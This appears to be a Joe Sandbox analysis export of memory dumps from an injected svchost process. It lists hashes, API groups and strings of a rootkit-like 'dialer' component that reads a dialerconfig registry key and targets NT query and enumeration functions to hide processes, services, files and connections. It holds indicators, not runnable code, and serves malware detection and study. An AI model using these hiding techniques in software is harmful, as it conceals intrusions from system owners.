                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction ID: 0c96960750685fec302c34b3f8663ecc79f570300fb7c2aed73a2559b29a8dfb
                                                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction Fuzzy Hash: AB315E32314F8286EB60CF66E8453DEB3A4F789758F500126EA9D43BA9DF38C565CB10
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction ID: 7b49fbff93479fdda29496addad81f337dd87c8182d345961adeb9ee9403585f
                                                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction Fuzzy Hash: E9315032215F8296EBA0CF66E8443EEB3A4F78A754F500126EA9D43B64DF38C565CB00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                • String ID:
                                                                                • API String ID: 1443284424-0
                                                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                • Instruction ID: f612d03db7efcc16af9fea9002cc24e17e430368533c55f3b341c67be3352bbd
                                                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                • Instruction Fuzzy Hash: 68E1F072B14AC28AF720CFA6D0892DDBBB1F345788F144116DE5A5BBD9DB38C52AC710

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 2135414181-2879589442
                                                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction ID: 6f6f03aa49396c289d864ba6f61ed6f587c25bd333f5821ff2ea26dbe766cb94
                                                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction Fuzzy Hash: F371F536310E5386FB609FA7E89A6DDB7B5FB88B88F001111DA4E47B68DF28C465C710

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 209 2917c971650-2917c9716e2 GetProcessHeap call 2917c983170 call 2917c971274 call 2917c971000 call 2917c971274 * 3 call 2917c971000 * 3 RegOpenKeyExW 228 2917c9716e8-2917c97170f RegOpenKeyExW 209->228 229 2917c9718ce-2917c9718d8 209->229 230 2917c971727-2917c971749 RegOpenKeyExW 228->230 231 2917c971711-2917c971715 228->231 233 2917c971762-2917c971784 RegOpenKeyExW 230->233 234 2917c97174b-2917c97174f 230->234 232 2917c971718 call 2917c9712c8 231->232 235 2917c97171d-2917c971721 RegCloseKey 232->235 237 2917c971786-2917c97178a 233->237 238 2917c97179d-2917c9717bf RegOpenKeyExW 233->238 236 2917c971753 call 2917c97104c 234->236 235->230 239 2917c971758-2917c97175c RegCloseKey 236->239 240 2917c97178e call 2917c9712c8 237->240 241 2917c9717d8-2917c9717fa RegOpenKeyExW 238->241 242 2917c9717c1-2917c9717c5 238->242 239->233 245 2917c971793-2917c971797 RegCloseKey 240->245 243 2917c971813-2917c971835 RegOpenKeyExW 241->243 244 2917c9717fc-2917c971800 241->244 246 2917c9717c9 call 2917c9712c8 242->246 248 2917c971837-2917c97183b 243->248 249 2917c97184e-2917c971870 RegOpenKeyExW 243->249 247 2917c971804 call 2917c9712c8 244->247 245->238 250 2917c9717ce-2917c9717d2 RegCloseKey 246->250 251 2917c971809-2917c97180d RegCloseKey 247->251 252 2917c97183f call 2917c97104c 248->252 253 2917c971872-2917c971876 249->253 254 2917c971889-2917c9718ab RegOpenKeyExW 249->254 250->241 251->243 255 2917c971844-2917c971848 RegCloseKey 252->255 256 2917c97187a call 2917c97104c 253->256 257 2917c9718c4-2917c9718c8 RegCloseKey 254->257 258 2917c9718ad-2917c9718b1 254->258 255->249 259 2917c97187f-2917c971883 RegCloseKey 256->259 257->229 260 2917c9718b5 call 2917c97104c 258->260 259->254 261 2917c9718ba-2917c9718be RegCloseKey 260->261 261->257
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction ID: eabd25cbee0ba6b4bb64629f564dd0af8ead6e27b0a4aa91122047340e85a818
                                                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction Fuzzy Hash: 10710936311E53D6FB909FA6E8586EAA7B4F786B88F405111DE4D97B28DF38C465C300

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                • Instruction ID: 9804424bea62868d5ef40deb71d74422bb9222a12c4e286567af976c7fd0d7f2
                                                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                • Instruction Fuzzy Hash: A95137B2314B4696FB64DFA3E5493DAB3B2F789B80F048124DA8A07B54DF3CC0658B50

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                • Instruction ID: 422bfdce62fdaa2b2baba05620e32bb7ecd40122cdf39df78144ed62ae1a6a88
                                                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                • Instruction Fuzzy Hash: A73185B430198BA0FB29EFE7E85FAD8B321A744344F805A13D51D123B59F398669D3B0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                • Instruction ID: 44a1c638149df812e22d073717f684dee3f751edebc25dd1814ee88c142079f9
                                                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                • Instruction Fuzzy Hash: 4C213D76714B5282F7209B66E5497DEB3A0F389BA4F504215EA5A02FE8CF3CC159CB10
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                • Instruction ID: 31007092358e39b0efb50317975e20fbf6607a068d582367e5fdd302f60ff1e8
                                                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                • Instruction Fuzzy Hash: B2418E73214B829BE7608FA3E4497DEB7A1F389B84F008129DB8907B58DF38D165CB50
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction ID: 12db5132529c1d4767bb71d641554eaa13f99c8e936037c6fdc0654bf7dd11e8
                                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction Fuzzy Hash: 1B819231B1464386FB64AFEFD84F3E9E290EB87B82F144415A945877D6DB38C9628730
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                • Instruction ID: 1fd53400cefc79f28e5f0c596c5e5b40acc2e65220aff2a1def9245621025751
                                                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                • Instruction Fuzzy Hash: AC31A332312B5395FE629F93E80A7D9B3A4BB08BA0F194525DD2D4B380EF38C4658720
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                • Instruction ID: fc9ce431e6f2b7382dee2b938d53d2f6987e3cc16be71361e9614d808f31065a
                                                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                • Instruction Fuzzy Hash: 46118E32314B5286F7609B83E84A39DB2A0F388BE4F004214EA5A877D4DF3CC5248750
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                • Instruction ID: 6a3c55ebfb2240c1356e493e26d9900c2a24269e5561269746279c3b4b99cf85
                                                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                • Instruction Fuzzy Hash: 10D18C76209F8A85EA709F5BE49939AB7A0F3C8B84F100116EACD47BA5DF3CC551CB10
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction ID: 6f4ba32b92c98d9f43710b2f38acc0c61c4c9e05d96ca69bd71f73519c75bdaf
                                                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction Fuzzy Hash: B0319261701B6396FBA5EF97E84A2E9E3A4FB44B84F0481249E4C07B54EF3CC4B58790
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction ID: ef72b06316c753c0684a3e6402df4776d55a1ff6bf55708ba6fcc62500bc0b05
                                                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction Fuzzy Hash: BC318562702B5792FB95DF97E9486BAE3A0FB46B94F0481209E4847B54EF38C5B1C700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction ID: 528a2bb23c40a460a140dc7eb62198b7d0f8312f95cb019315eff54dce06bf00
                                                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction Fuzzy Hash: 2A010971300A4396FA64AB93E4597D9A3A1F788BC0F484435DE9943794DF3CC9958750
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction ID: 72c616c9ca87fa0e2fb3a8a481409ecff5dfd38378163874a26b9cde0d7ea4b0
                                                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction Fuzzy Hash: 06015B21300A43D6FA94DB93E4583AAA3A1F789FC0F484035CE8D43B54DF38C9958300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                • Instruction ID: e91eddb943dd45e48329029120936840e4bf1c0966dcc50cb251196b09367c1e
                                                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                • Instruction Fuzzy Hash: 43112D75711B5386FBB49BA3E80E7DAA7A0BB48B81F044525CD4947794EF3DC428C721
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                • Instruction ID: bcb007f12f0a80f6abfa06b0a50998d9f56ba69d5ee696c07124d5dc7ed47f4f
                                                                                • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                • Instruction Fuzzy Hash: EE51BC32B11B078AFB54CF97E84DB99B7A5F344BA8F508120DA1A4B788DB35C861C760
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                • Instruction ID: 59d09a8618965b64426e9fa1b4f2833b0c2e479f01b98339679c6812110e112a
                                                                                • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                • Instruction Fuzzy Hash: D151B1323126438AFB94DFB6E44CBB9B7A5F346BA8F528120DE1647788DB35D961C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                • Instruction ID: 17e51d28d513f920e32d509f1b692e7e2fcfc1ce129dd6027d301d8539b66207
                                                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                • Instruction Fuzzy Hash: 81F0447230464392FB709FA3F49A3DDE761F744B88F848020CA49466A4DF2CC658CB50
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction ID: 0bd278625c2eb5fe3e1e5d9e951961a74a9a5ca064144fcba52b3caf06c18908
                                                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction Fuzzy Hash: DFF08234304B9391FAA08B93F94A1DDE220EB8CFD0F088131DE9A07BA8CF2CC4618310
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction ID: d6a5dade3bbd5061acbb23ef2f01d1b8c8b8e437621835871371c2175c78e0f4
                                                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction Fuzzy Hash: BAF08220304BC3D1FA908B93F9581BAE2A1BB4AFD0F488131DE5A47B29CF2CC4618300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction ID: c0f4d0548e0eb18f2c1711cebe02f3013e3323000a8f68909576bd92bec2315b
                                                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction Fuzzy Hash: C3F0FE72311A4791FFA55FA3E88A3E9A360EB48B91F442019951B457A4DF2CC4A9C720
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction ID: b2252719d7807a4161f4be65e9cb1341e5322c5c32aab674f2488dc8c664b936
                                                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction Fuzzy Hash: FBF0FE61362A47D1FFD44FA2E8983BAA7A0AB89B90F442019951B477A4DF28C5A8C700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                • Instruction ID: 3c71fb551ff85124351bb61e6e9810b4d1d377b3f38adbf1823fe499c0a68a58
                                                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                • Instruction Fuzzy Hash: 1302BC36219B8686E760CF96E49539AF7A0F3C5794F104116EA8E87BA8DF7CC854CF10
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                • Instruction ID: 44327ac94c9b3ef627a8d402e10e2c805b34a062bac7a7261ec5c7f2b4dc9c5e
                                                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                • Instruction Fuzzy Hash: D602BD36119B86C6E7E0CB96E4947AAF7A0F3C5794F104115EA8E87B69DF7CC454CB00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 2210144848-0
                                                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                • Instruction ID: 94d916d7f8feb0ef2b8ba1ce694d3cfa2411a0f37bfc6617e74d27390b1daef3
                                                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                • Instruction Fuzzy Hash: 52819D36710A9389FB609FE7D88A3EDA6A0F754B88F444216DE4A6B7D1DB34C461C730
                                                                                APIs
                                                                                Memory Dump Source
